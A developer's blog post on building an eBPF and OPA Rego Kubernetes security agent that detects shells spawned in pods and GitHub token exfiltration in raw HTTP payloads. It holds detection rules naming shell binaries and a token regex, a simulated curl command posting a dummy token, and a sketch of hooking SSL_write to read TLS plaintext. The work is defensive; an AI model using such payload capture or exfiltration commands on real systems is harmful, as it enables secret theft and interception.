I Built an eBPF Security Agent That Catches GitHub PAT Exfiltration at the Kernel Level

From zero eBPF experience to reading raw HTTP payloads out of kernel memory

I wanted to understand how runtime security tools like Falco and Tetragon actually work — not just use them, but build something from scratch that does what they do.

So I built krato — an eBPF-powered Kubernetes security agent that detects malicious processes and GitHub PAT exfiltration at the kernel level, with detection rules written in OPA Rego.

Here's everything I learned.

What even is eBPF?

Your Linux machine has two zones:

User space — everything you interact with. Your browser, terminal, apps.

Kernel space — the OS core. Every time an app wants to do anything — open a file, spawn a process, send network data — it asks the kernel via a syscall.

eBPF lets you inject a tiny sandboxed program directly into the Linux kernel that runs every time a specific event happens. Every process spawn. Every network packet. At near-zero overhead.

For security, this changes everything. Traditional tools match signatures — known bad patterns. If the attack is new, no signature exists, it gets through.

eBPF watches behavior. It doesn't need to know what the attack is. It watches what every process does at the kernel level. A container that spawns a bash shell and makes an outbound network call — suspicious regardless of whether a CVE exists.

The architecture

Two parallel detection pipelines, one rule engine:

┌─────────────────────────────────────────────┐
│               Linux Kernel                  │
│                                             │
│   execve()              tcp_sendmsg()       │
│   (process spawn)       (outbound TCP)      │
└──────┬─────────────────────────┬────────────┘
       │                         │
       ▼                         ▼
  ┌─────────┐            ┌──────────────┐
  │Tetragon │            │  dpi.c       │
  │(eBPF)   │            │  (custom     │
  │         │            │   eBPF C)    │
  └────┬────┘            └──────┬───────┘
       │                        │
       └──────────┬─────────────┘
                  ▼
           ┌────────────┐
           │  Go Agent  │
           └─────┬──────┘
                 │
                 ▼
         ┌──────────────┐    ┌─────────────────┐
         │  OPA Engine  │◄───│  Rego Policies  │
         └──────┬───────┘    │  process.rego   │
                │            │  network.rego   │
                ▼            └─────────────────┘
           🚨 Alert

Three components:

Tetragon — Cilium's eBPF tool for process event detection, streams structured events over gRPC
dpi.c — custom eBPF C program I wrote that hooks tcp_sendmsg and reads raw payload bytes
OPA + Rego — rule engine so detection logic lives in text files, not compiled code

Setting up the cluster

I used Kind (Kubernetes in Docker) to spin up a local cluster:

kind create cluster --name ebpf-agent
helm repo add cilium https://helm.cilium.io
helm install tetragon cilium/tetragon -n kube-system

Key insight — Kind containers share your host machine's Linux kernel. There is no separate cluster kernel. This is why eBPF programs loaded inside Kind see processes on your actual laptop. Containers are not VMs.

I verified Tetragon was working by tailing its export log:

kubectl logs -n kube-system <tetragon-pod> -c export-stdout | head -20

Immediately fascinating — I could see my own Hyprland keyboard layout scripts firing every few seconds, with full process trees, arguments, UIDs, and nanosecond timestamps. The kernel sees everything.

Part 1 — Malicious Process Detection

The OPA engine

Instead of hardcoding detection logic in Go, I put all rules in .rego files. The Go agent just asks OPA: "does this event violate any rules?"

Add a new detection rule → drop a .rego file. No code changes, no rebuild.

My first Rego rule:

package agent.process

deny[msg] if {
    input.type == "process_exec"
    input.container.pod_name != ""        # only care about pods, not host processes
    shell_binary(input.process.binary)
    msg := sprintf(
        "Shell spawned in pod [%s/%s] — binary: %s",
        [input.container.namespace, input.container.pod_name, input.process.binary]
    )
}

shell_binary(b) if b == "/bin/bash"
shell_binary(b) if b == "/bin/sh"
shell_binary(b) if b == "/usr/bin/bash"

Wiring Tetragon gRPC

Tetragon exposes a FineGuidanceSensors gRPC service. The Go agent opens a persistent stream:

client := tetragonAPI.NewFineGuidanceSensorsClient(conn)
stream, err := client.GetEvents(ctx, &tetragonAPI.GetEventsRequest{})

for {
    event, err := stream.Recv()
    // parse → OPA → alert
}

One gotcha — Tetragon's Helm chart defaults to a Unix socket, not TCP. Fix:

helm upgrade tetragon cilium/tetragon -n kube-system \
  --set tetragon.grpc.address="localhost:54321"

The test

kubectl run test-nginx --image=nginx --restart=Never
kubectl exec -it test-nginx -- /bin/bash

The moment I hit enter:

🚨 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   ALERT — process_exec
🚨 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   → Shell spawned in pod [default/test-nginx] — binary: /bin/bash
   binary:  /bin/bash
   parent:  /usr/local/bin/containerd-shim-runc-v2
   uid:     0
   pod:     default/test-nginx

   raw event:
   {
     "container": { "name": "test-nginx", "namespace": "default", "pod_name": "test-nginx" },
     "process": { "binary": "/bin/bash", "uid": 0, "pid": 396155 },
     "type": "process_exec"
   }
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Real kernel event. Real alert. End to end.

(Screenshot: agent terminal showing red alert for shell-in-nginx)

Part 2 — Deep Packet Inspection for GitHub PAT Exfiltration

This is where it got genuinely hard.

Why Tetragon wasn't enough

Tetragon tells you a process made a network connection. It doesn't show you the payload — the actual bytes sent. To detect a GitHub PAT (ghp_*) inside an outbound HTTP request, I needed to read the raw data.

Solution: write my own eBPF program in C.

How tcp_sendmsg works

Every time any process sends TCP data, the kernel calls:

int tcp_sendmsg(struct sock *sk, struct msghdr *msg, size_t size);

The msghdr contains a msg_iter — an iterator over the bytes being sent. By hooking this function with a kprobe and reading that iterator, I can see the payload before it leaves the machine.

Writing the eBPF C program — what I learned

1. Generate vmlinux.h from your kernel's BTF data

bpftool btf dump file /sys/kernel/btf/vmlinux format c > ebpf/vmlinux.h

This gives you all kernel struct definitions for your exact kernel. 159,000 lines. You need this instead of individual kernel headers.

2. Kernel 6.18 uses ITER_UBUF — this was the critical bug

The msg_iter has an iter_type field. On older kernels, iterators are always ITER_IOVEC (type 1). On kernel 6.18, curl and most send() calls use ITER_UBUF (type 0) — a simpler single-buffer iterator.

My original code only handled ITER_IOVEC. Nothing was being read. Fixed by branching on iter_type:

iter_type = BPF_CORE_READ(msg, msg_iter.iter_type);

if (iter_type == ITER_IOVEC) {
    iov_ptr = BPF_CORE_READ(msg, msg_iter.__iov);
    // read from iov_ptr->iov_base + iov_offset
} else if (iter_type == ITER_UBUF) {
    ubuf = BPF_CORE_READ(msg, msg_iter.ubuf);
    // read directly from ubuf + iov_offset
}

3. The & 511 mask bug

When reading payload bytes:

// DANGEROUS
bpf_probe_read_user(event->payload, event->payload_len & (MAX_PAYLOAD_SIZE - 1), src);

When payload_len == 512 and MAX_PAYLOAD_SIZE == 512: 512 & 511 = 0. Reading zero bytes. Fixed:

__u32 read_len = count > MAX_PAYLOAD_SIZE ? MAX_PAYLOAD_SIZE : (__u32)count;

4. Use BPF_CORE_READ everywhere

Direct struct field access breaks across kernel versions. BPF_CORE_READ uses CO-RE for safe cross-kernel compatibility:

count = BPF_CORE_READ(msg, msg_iter.count);
iov_offset = BPF_CORE_READ(msg, msg_iter.iov_offset);

5. Try user memory first, fall back to kernel

static __always_inline long read_memory(void *dst, __u32 len, const void *src) {
    long ret = bpf_probe_read_user(dst, len, src);
    if (ret < 0)
        ret = bpf_probe_read_kernel(dst, len, src);
    return ret;
}

Compiling and loading

clang -O2 -g -target bpf \
    -D__TARGET_ARCH_x86 \
    -I ebpf/ \
    -c ebpf/dpi.c \
    -o internal/dpi/dpi_bpf.o

The Go agent loads this at runtime using cilium/ebpf:

spec, _ := ebpf.LoadCollectionSpec("internal/dpi/dpi_bpf.o")
coll, _ := ebpf.NewCollection(spec)
kp, _ := link.Kprobe("tcp_sendmsg", coll.Programs["kprobe_tcp_sendmsg"], nil)
rd, _ := ringbuf.NewReader(coll.Maps["events"])

The moment it worked

Inside the nginx container:

curl -X POST http://10.244.0.7:8080 \
  -d 'token=ghp_1234567890abcdefghijklmnopqrstuvwxyz'

Agent terminal:

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔑 CRITICAL — GitHub PAT EXFILTRATION DETECTED
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
PID:     397417
Process: curl
Payload: POST / HTTP/1.1
Host: 10.244.0.7:8080
User-Agent: curl/8.14.1
Content-Type: application/x-www-form-urlencoded

token=ghp_1234567890abcdefghijklmnopqrstuvwxyz
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

My eBPF program read the raw HTTP payload from kernel memory and surfaced the PAT before the data left the machine.

Something interesting — the same PAT appeared at multiple layers:

🔑 CRITICAL — GitHub PAT EXFILTRATION DETECTED
PID:     2079
Process: containerd          ← caught at container runtime level

🔑 CRITICAL — GitHub PAT EXFILTRATION DETECTED  
PID:     397417
Process: curl                ← caught in the actual HTTP payload

That's kernel-level visibility. The same secret surfaced at every layer of the stack.

(Screenshot: terminal showing both alerts firing)

Why OPA Rego makes this production-ready

Detection logic lives entirely in .rego files — not Go code.

Adding a new detection rule:

deny[msg] if {
    input.type == "network_connect"
    input.container.pod_name != ""
    regex.match(`ghp_[A-Za-z0-9]{36}`, input.network.payload)
    msg := sprintf("GitHub PAT detected → %s", [input.network.dest_ip])
}

Drop the file. Agent picks it up on restart. Security teams write and audit rules without touching Go. Rules are version-controlled and diffable like any other code.

Same pattern production tools use — Falco's rules language, Tetragon's TracingPolicy CRDs. Separate detection logic from detection infrastructure.

What I'd build next

SSL uprobe for HTTPS traffic

The current DPI only catches unencrypted HTTP. For HTTPS, data is encrypted before tcp_sendmsg sees it.

Fix: attach a uprobe to SSL_write in libssl.so. This function is called with plaintext data before encryption. Hook it there and you can read TLS payloads. This is how Pixie and Hubble do production DPI.

uprobes:
  - path: "/usr/lib/x86_64-linux-gnu/libssl.so.3"
    symbol: "SSL_write"
    args:
      - index: 1
        type: "char_buf"
        sizeArgIndex: 2

Threat intel feed integration

Pull known bad IPs from OTX or MISP into OPA as external data. Rules check destination IPs against a live feed — zero Go changes needed.

Policy hot-reload

Use inotify to watch the policies directory. .rego file changes → reload OPA engine in place. Zero downtime rule updates.

Key takeaways

Runtime security is fundamentally about being as close to the kernel as possible. Signatures and logs are too slow, too far from the action. eBPF puts detection where events actually happen — at syscall time, before data leaves the machine.

The specific lessons:

Kernel 6.18 changed iov_iter to prefer ITER_UBUF — always branch on iter_type
Use BPF_CORE_READ for CO-RE compatibility across kernel versions
The & (MAX_PAYLOAD_SIZE - 1) pattern is dangerous when payload equals buffer size exactly
bpf_probe_read_user with kernel fallback covers most memory access patterns
Kind shares the host kernel — eBPF programs see everything, not just cluster processes

The repo

Full project open source at github.com/karandesai2005/krato

Includes: eBPF C program with full ITER_UBUF/ITER_IOVEC handling, OPA Rego rules for process detection and DPI, Tetragon gRPC listener, Kind cluster setup scripts, architecture diagram.

Karan Desai — security engineer, final year CS at SIT Pune. Metasploit Framework contributor. IEEE SA Cybersecurity Hackathon 2026 — 1st place, 190 teams, 34 countries. Active bug bounty researcher on Bugcrowd.

GitHub: github.com/karandesai2005 | Portfolio: karan-desai.vercel.app